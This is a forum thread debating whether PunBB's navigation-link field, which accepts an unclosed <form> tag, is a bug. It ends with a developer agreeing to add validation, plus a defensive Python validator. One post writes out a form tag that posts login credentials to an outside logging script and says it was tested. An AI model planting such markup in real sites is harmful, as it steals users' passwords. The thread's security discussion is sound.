1

Topic: Unclosed Form tag in navlinks

Not a serious bug, just a big annoyance if you do do it.

A friend tried to add a PayPal link to his links ("Additional menu items"), he basically did

<form action="http://paypal.com/..">

as a link, this wouldn't actually work but I think he was just playing around, anyway, the problem is that from then whenever he tried to do anything form related (admin, logging in, registering, etc. etc.) the site just went to paypal.com. I know he shouldn't have added the unclosed form tag, but the problem is that IF you do then it's impossible to actually remove it without editing the header or manually altering the database.

2

Re: Unclosed Form tag in navlinks

This isn't a bug, it's user error. The instructions for adding additional links make it clear you are supposed to add hyperlinks in the specified format; nowhere do the instructions say you can add any other tags, closed or otherwise.

3 (edited by mrse0 2006-06-27 13:31)

Re: Unclosed Form tag in navlinks

My point is that it's a user error that, due to the way PunBB deals with it, is impossible to fix without some form of editing that is above PunBB. Meaning that some users of PunBB (without MySQL/PHP knowledge or perhaps access to MySQL or to modify PHP) could render their PunBB install completely useless with a simple user mistake.

Is that not a bug? I don't think you can dismiss this simply because users should have read the manual..

Re: Unclosed Form tag in navlinks

Not really a bug, no. It's your own fault, if you can't change anything manually, you shouldn't be messing things up =/

5

Re: Unclosed Form tag in navlinks

Surely the people incapable of changing things manually are more likely to mess things up?
In this case, were it not for me, my friend probably wouldn't have been able to solve his problem..

6 (edited by mrse0 2006-06-27 13:57)

Re: Unclosed Form tag in navlinks

O.K. here's a scenario that will surely prove to you guys it's a bug.

Rogue Admin wants to steal usernames and passwords, so he adds a link to <form action="http://hissite.com/logger.php" method="POST">
logger.php is a script that logs all data submitted to it.

Now whenever a user tries to login they submit their login details to the rogue administrators website. I've tested this and it works.

Is that not bugworthy?
Now that it's intentional and not due to user stupidity (which is something that should be considered) will you accept this as a bug?
I admit that rogue administrators aren't likely, but it is quite possible and could result in a lot of stolen usernames and passwords.

Re: Unclosed Form tag in navlinks

Ok, so what do you suggest? A regex check on the input to see if it's a link? And what if I'd like to add a small form in there? Or a <br />? Or an img? Wouldn't be possible anymore.
And I think it'd be quite hard to just check if a tag is closed... =/

8 (edited by mrse0 2006-06-27 14:39)

Re: Unclosed Form tag in navlinks

Are you honestly suggesting that a serious security vulnerability shouldn't be fixed because it might be hard to solve?
Surely this is intended only for links and if you did want to add anything else you would simply edit the template.

A solution doesn't come to mind immediately but I think this is a bug that should be considered.

Re: Unclosed Form tag in navlinks

I really don't think this is a "serious security vulnerability". I don't think it should be classified as a vulnerability at all. Yes, an administrator can control what markup the forum outputs. What about templates? Couldn't an administrator insert malicious markup in the templates? Yes, he could. An administrator can always find ways to do this and there is no way to stop him from doing so. PunBB is no different from any other forum software in this regard. We have no choice but to trust the administrator. If we don't, well, then don't visit the forum in question.

Having said that, some kind of validation on the contents of that form field is probably in order. Not from a security standpoint, but because ill-formed markup can break the forums. I will put it on the list and have a look at it for 1.3.

"Programming is like sex: one mistake and you have to support it for the rest of your life."

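Added example, not part of the thread and not PunBB's own code: one way to validate the "Additional menu items" field discussed above, using an HTML parser rather than a regex, so that an unclosed `<form>` or any other tag is rejected and the stored link is rebuilt from its parsed parts. The entry format `X = <a href="URL">LINK</a>` and the names `AnchorOnly` and `clean_menu_item` are assumptions made for this sketch.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit
ENTRY = re.compile(r"^\s*(\d+)\s*=\s*(.+)$")  # assumed entry format: X = <a ...>
SAFE_SCHEMES = {"", "http", "https"}          # "" means a relative URL

class AnchorOnly(HTMLParser):
    """Collects one <a href>text</a>; anything else is recorded as an error."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.errors, self.href, self.text, self.state = [], None, "", 0

    def handle_starttag(self, tag, attrs):
        if tag != "a" or self.state:
            self.errors.append(f"<{tag}> not allowed here")
            return
        self.state = 1  # inside the single permitted link
        if any(name != "href" for name, _ in attrs):
            self.errors.append("only the href attribute is allowed")
        self.href = dict(attrs).get("href")

    def handle_endtag(self, tag):
        if tag == "a" and self.state == 1:
            self.state = 2  # link closed; nothing may follow
        else:
            self.errors.append(f"</{tag}> not allowed here")

    def handle_data(self, data):
        if self.state == 1:
            self.text += data
        elif data.strip():
            self.errors.append("text outside the link")

def clean_menu_item(line):
    """Return (position, link rebuilt from parsed parts) or raise ValueError."""
    m = ENTRY.match(line)
    if not m:
        raise ValueError('expected: X = <a href="URL">LINK</a>')
    p = AnchorOnly()
    p.feed(m.group(2))
    p.close()
    if p.state != 2 or not p.text.strip():
        p.errors.append("need exactly one closed <a>...</a> with link text")
    if not p.href or re.search(r"[\x00-\x20]", p.href) or urlsplit(p.href).scheme not in SAFE_SCHEMES:
        p.errors.append("href must be a relative or http(s) URL")
    if p.errors:
        raise ValueError("; ".join(p.errors))
    return int(m.group(1)), f'<a href="{escape(p.href)}">{escape(p.text.strip())}</a>'
```

Because the output is re-serialised from the parsed href and link text, nothing the administrator typed is echoed into the page header verbatim, so a malformed entry cannot swallow the forms that follow it.
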
10

Re: Unclosed Form tag in navlinks

Fair enough, but I disagree with the assumption that the administrator can modify templates, I am an administrator on PunBB boards where I have access to nothing but PunBB.

Re: Unclosed Form tag in navlinks

Well, PunBB is "safe" from that, but most other forums that are template-driven allow administrators to edit the templates from within the admin interface. I guess what I'm saying is, if this should be classed as a vulnerability, then all forum software is vulnerable.